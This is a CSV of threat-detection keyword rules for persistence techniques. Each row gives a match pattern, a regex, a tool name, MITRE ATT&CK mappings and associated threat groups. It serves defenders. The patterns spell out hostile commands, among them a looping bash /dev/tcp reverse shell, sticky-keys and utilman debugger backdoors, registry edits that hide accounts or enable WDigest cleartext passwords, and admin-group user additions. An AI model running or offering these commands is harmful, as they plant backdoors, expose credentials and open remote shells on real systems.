"*net users /add troll Trolololol123*",".{0,1000}net\susers\s\/add\stroll\sTrolololol123.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*net* group Administrator* /add /domain*",".{0,1000}net.{0,1000}\sgroup\sAdministrator.{0,1000}\s\/add\s\/domain.{0,1000}","greyware_tool_keyword","net","adding a user to a privileged group. This action can be used by adversaries to maintain unauthorized access or escalate privileges within the targeted environment.","T1098","TA0003","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*net.exe localgroup ""Remote Desktop Users"" * /add*",".{0,1000}net\.exe\slocalgroup\s\""Remote\sDesktop\sUsers\""\s.{0,1000}\s\/add.{0,1000}","greyware_tool_keyword","net","Adds a user account to the local Remote","T1035 - T1078 - T1087","TA0003 ","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net.exe localgroup *Backup Operators*",".{0,1000}net\.exe\slocalgroup\s.{0,1000}Backup\sOperators.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net.exe"" localgroup *Backup Operators*",".{0,1000}net\.exe\""\slocalgroup\s.{0,1000}Backup\sOperators.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net1 localgroup ""Remote Desktop Users"" * /add*",".{0,1000}net1\slocalgroup\s\""Remote\sDesktop\sUsers\""\s.{0,1000}\s\/add.{0,1000}","greyware_tool_keyword","net","Adds a user account to the local Remote","T1035 - T1078 - T1087","TA0003 ","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*netbiosX/AMSI-Provider*",".{0,1000}netbiosX\/AMSI\-Provider.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","1","N/A","N/A","10","2","141","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*netero1010/ScheduleRunner*",".{0,1000}netero1010\/ScheduleRunner.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*netsh add helper netshBad.DLL*",".{0,1000}netsh\sadd\shelper\snetshBad\.DLL.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z"
"*nickvourd/COM-Hunter*",".{0,1000}nickvourd\/COM\-Hunter.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*nohup bash -c ""while :; do bash -i >& /dev/tcp/*/* 0>&1; sleep 10; done*",".{0,1000}nohup\sbash\s\-c\s\""while\s\:\;\sdo\sbash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\;\ssleep\s10\;\sdone.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*NT AUTHOIRTY\SYSTEM*",".{0,1000}NT\sAUTHOIRTY\\SYSTEM.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*Octoberfest7/JumpSession_BOF*",".{0,1000}Octoberfest7\/JumpSession_BOF.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","78","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z"
"*outflanknl/SharpHide*",".{0,1000}outflanknl\/SharpHide.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*panix.sh --ssh-key *",".{0,1000}panix\.sh\s\-\-ssh\-key\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*PASSWORD = ""Letmein123!*",".{0,1000}PASSWORD\s\=\s\""Letmein123!.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*PayGen*python3 generate.py*",".{0,1000}PayGen.{0,1000}python3\sgenerate\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z"
"*Peaky-XD/webshell*",".{0,1000}Peaky\-XD\/webshell.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","",""
"*Persist\autorun.cs*",".{0,1000}Persist\\autorun\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*Persist\eventviewer.cs*",".{0,1000}Persist\\eventviewer\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*Persist\powershell.cs*",".{0,1000}Persist\\powershell\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*Persist\screensaver.cs*",".{0,1000}Persist\\screensaver\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*Persist\startup.cs*",".{0,1000}Persist\\startup\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*Persist\winlogon.cs*",".{0,1000}Persist\\winlogon\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*Persistence-Accessibility-Features-master*",".{0,1000}Persistence\-Accessibility\-Features\-master.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*php -S 0.0.0.0:9056 &*",".{0,1000}php\s\-S\s0\.0\.0\.0\:9056\s\&.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*plink -N -L *:localhost:3389 *",".{0,1000}plink\s\-N\s\-L\s.{0,1000}\:localhost\:3389\s.{0,1000}","greyware_tool_keyword","plink","creates an SSH tunnel from the local machine to the remote machine allowing the user to connect to an RDP session on the remote machine through port 3389. This plink usage is often used by attackers","T1573 - T1021.004 - T1213.002","TA0010 - TA0011 - TA0008","N/A","BlackCat - PLAY - LockBit - Scattered Spider*","Persistence","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*PoshADCS-master.zip*",".{0,1000}PoshADCS\-master\.zip.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"*powerdump.ps1*",".{0,1000}powerdump\.ps1.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*processhacker-*-sdk.zip*",".{0,1000}processhacker\-.{0,1000}\-sdk\.zip.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*processhacker-*-setup.exe*",".{0,1000}processhacker\-.{0,1000}\-setup\.exe.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*processhacker-*-src.zip*",".{0,1000}processhacker\-.{0,1000}\-src\.zip.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*ProcessHacker.exe*",".{0,1000}ProcessHacker\.exe.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*ProcessHacker.sln*",".{0,1000}ProcessHacker\.sln.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*ProductName*>AtNow<*",".{0,1000}ProductName.{0,1000}\>AtNow\<.{0,1000}","greyware_tool_keyword","atnow","AtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TA","T1053 - T1059","TA0002 ","N/A","APT18 - APT29 - APT32 - Cobalt - RTM","Persistence","https://www.nirsoft.net/utils/atnow.html","1","0","#productname","N/A","7","7","N/A","N/A","N/A","N/A"
"*programdata\* --start-with-win --remove-first --silent --start-service*",".{0,1000}programdata\\.{0,1000}\s\-\-start\-with\-win\s\-\-remove\-first\s\-\-silent\s\-\-start\-service.{0,1000}","greyware_tool_keyword","anydesk","command line used with anydesk in the notes of the Dispossessor ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Pspersist-main*",".{0,1000}Pspersist\-main.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
"*PSprofile.cpp*",".{0,1000}PSprofile\.cpp.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
"*pty.spawn(""/bin/sh""* >> /etc/update-motd.d/00-header*",".{0,1000}pty\.spawn\(\""\/bin\/sh\"".{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass|pass*",".{0,1000}pwd\|passwd\|password\|PASSWD\|PASSWORD\|dbuser\|dbpass\|pass.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*r4wd3r/RID-Hijacking*",".{0,1000}r4wd3r\/RID\-Hijacking.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*r4wd3r/Suborner*",".{0,1000}r4wd3r\/Suborner.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","468","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z"
"*r77Rootkit%201.5.2.zip*",".{0,1000}r77Rootkit\%201\.5\.2\.zip.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist"" /v * /t REG_DWORD /d 0 /f*",".{0,1000}reg\sadd\s\""HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\sNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\""\s\/v\s.{0,1000}\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","Hides the user from the login screen - a tactic often used for stealthy persistence.","T1547.001","TA0003","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"" /v fDenyTSConnections /t REG_DWORD /d 0 /f*",".{0,1000}reg\sadd\s\""HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal\sServer\""\s\/v\sfDenyTSConnections\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","Open passwords mimic + open rdp 3389 - used by many ransomware groups","T1112 - T1003 - T1076","TA0003 - TA0005 - TA0006","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\"" /v *.dll*",".{0,1000}reg\sadd\s\""HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpClient\\\""\s\/v\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#registry","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /v Debugger /t REG_SZ /d ""C:\windows\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\""\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""C\:\\windows\\system32\\cmd\.exe\"".{0,1000}","offensive_tool_keyword","Windows-Crack","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/japd06/Windows-Crack/","1","0","#registry","N/A","9","1","22","10","2019-04-17T21:54:13Z","2019-06-19T04:00:51Z"
"*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*",".{0,1000}REG\sADD\s.{0,1000}HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe.{0,1000}\s\/t\sREG_SZ\s\/v\sDebugger\s\/d\s.{0,1000}\\windows\\system32\\cmd\.exe.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Hit F5 a bunch of times when you are at the RDP login screen","T1546.012 - T1059.003 - T1055.001 - T1112","TA0002 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Persistence","N/A","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*",".{0,1000}REG\sADD\s.{0,1000}HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\utilman\.exe.{0,1000}\s\/t\sREG_SZ\s\/v\sDebugger\s\/d\s.{0,1000}\\windows\\system32\\cmd\.exe.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","At the login screen press Windows Key+U and you get a cmd.exe window as SYSTEM.","T1546.012 - T1059.003 - T1055.001 - T1112","TA0002 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Persistence","N/A","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add \""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\"" /t REG_DWORD /f /d 0 /v *",".{0,1000}reg\sadd\s\\\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\\""\s\/t\sREG_DWORD\s\/f\s\/d\s0\s\/v\s.{0,1000}","greyware_tool_keyword","reg","command used in the Dispossessor ransomware group notes - The account will no longer be visible on the Windows login screen.","T1098 - T1068 - T1112 - T1088 - T1546.015 - T1059","TA0001 - TA0002 - TA0003 - TA0004 - TA0008","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1*",".{0,1000}reg\sadd\sHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\s\/v\sUseLogonCredential\s\/t\sREG_DWORD\s\/d\s1.{0,1000}","greyware_tool_keyword","reg","Open passwords mimic + open rdp 3389 - used by many ransomware groups","T1112 - T1003 - T1076","TA0003 - TA0005 - TA0006","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*REG DELETE ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe""*",".{0,1000}REG\sDELETE\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\"".{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#registry","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*Register-MaliciousWmiEvent*",".{0,1000}Register\-MaliciousWmiEvent.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*Registry KeeTheifLurker * Created*",".{0,1000}Registry\sKeeTheifLurker\s.{0,1000}\sCreated.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*regsvr32 AmsiProvider.dll*",".{0,1000}regsvr32\sAmsiProvider\.dll.{0,1000}","greyware_tool_keyword","regsvr32","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","The AMSI Provider can be registered with the system by executing the following command from an elevated command prompt - risk of false positive","9","2","141","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*REM getting browser history*",".{0,1000}REM\sgetting\sbrowser\shistory.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*REM wipe the logs*",".{0,1000}REM\swipe\sthe\slogs.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
